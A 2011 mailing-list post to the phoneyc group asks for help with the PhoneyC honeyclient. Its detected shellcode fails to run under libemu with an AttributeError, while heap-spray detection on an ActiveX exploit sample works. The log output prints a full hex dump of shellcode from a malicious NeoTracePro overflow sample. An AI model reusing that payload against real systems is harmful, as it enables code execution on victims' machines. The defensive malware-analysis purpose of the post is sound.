Marta
unread,May 15, 2011, 2:16:00 PM5/15/11Sign in to reply to author
Sign in to forward
You do not have permission to delete messages in this group
Sign in to report message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to phoneyc
Hi!
I've been nearly all day fighting with this problem, searching
everywhere for similar problems, repeating the steps... but no luck
for me.
I've followed all instructions, and in both modes (Option 1 & option
2). Heapspray attacks are correctly detected and shellcodes are
detected but can't be executed.
libemu -> trunk version (0.2.0)
curl -> 7.19.7
python -> 2.6.5
(Ubuntu Server 10.04)
Could yo help me with this? I'm a beginner with honeyclients.
Thanks for your time and patience.
I leave here two execution samples:
*Shellcode can't be executed*:
sudo python ./phoneyc.py file://samples/4158.html
[2011-05-15 20:01:49] [ALERT] NeoTracePro.TraceTarget overflow in arg0
Log written into: log/ad5048081277127857aad08e0bfd5e55
====================================
|--------AID:1----------
|ATYPE:ALERT_SHELLCODE
|MESSAGE:Shellcode Detected!
|MISC:{}
|LENGTH:752
|SHELLCODE:
eb0359eb05e8f8ffffff494937494949494949494949494949494949515a6a625830423050416b41417232414241423242413042415838414250757a496b4c435a586b726d4d385969496f496f696f51704c4b324c446441344e6b4735474c4e6b634c7445325853315a4f4c4b726f75486e6b536f57503661486b63794e6b70346c4b64416a4e54714f304f696e4c6b344f30516444475a61395a544d44416f324a4b4964656b42746464713861655a456e6b636f65746551786b55366c4b666c504b4c4b514f476c4551786b7773546c6e6b4e69724c6134576c42414f3346514b6b31744c4b715350304c4b6150666c6c4b3430376c4c6d4c4b47306778414e73586e6e326e766e5a4c76304b4f48564246727375364358347374724248543732533472736f42746b4f7a707068584b586d4b4c774b30504b4f5a76536f6d594b5563564f716a4d533834426635724a4442396f385050686e3964494b456e4d30574b4f49465363305363633633536331535143304333634b4f4a7050667178496d524c435656334c494d316e7550684c64345a50706f374637396f4e36706a745043617635796f585061786d744e4d764e6d395277796f4e3633633365496f4a705358497537394e66704946374b4f4e366630763466346635696f48507a33424839777079784631695057396f6b665365696f68506536735a6534706631785173724d6f796d35317a427066394139584c6e694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b4f42553044596f7946636b70577272727146315051324a64417051327141454631396f6a7063584c6d6e395775584e4363496f6b66517a4b4f6b4f7567696f68504e6b3637396c4c4338445064496f5a764632496f7a7075386c306e6a4554714f46336b4f4e366b4f6e3062
|Now run it:
Traceback (most recent call last):
File "./phoneyc.py", line 194, in <module>
report(alerts)
File "./phoneyc.py", line 119, in report
shellcoderesult = alert.run_shellcode()
File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line
31, in run_shellcode
return e.run_shellcode(self.shellcode,self.offset)
AttributeError: 'libemu.Emulator' object has no attribute
'run_shellcode'
*Heapspray attack detected ok*
sudo python ./phoneyc.py file://samples/Pps.html
[2011-05-15 19:59:35] [ALERT] PPStream (PowerPlayer.dll 2.0.1.3829)
ActiveX Remote Overflow Exploit in Logo property
Log written into: log/3a47adf41c41079156ee8c0fe439c70e
====================================
|--------AID:1----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:3
|MEMUSAGE:524044
|LENGTH:524044
|ENTROPY:0.0
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 0, 'sledge_cnt': 524044,
'sec_char': '\x00'}
====================================
|--------AID:2----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:400
|MEMUSAGE:209699200
|LENGTH:524248
|ENTROPY:0.00735793427204
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 12, 'sledge_cnt':
524045, 'sec_char': '\x8b'}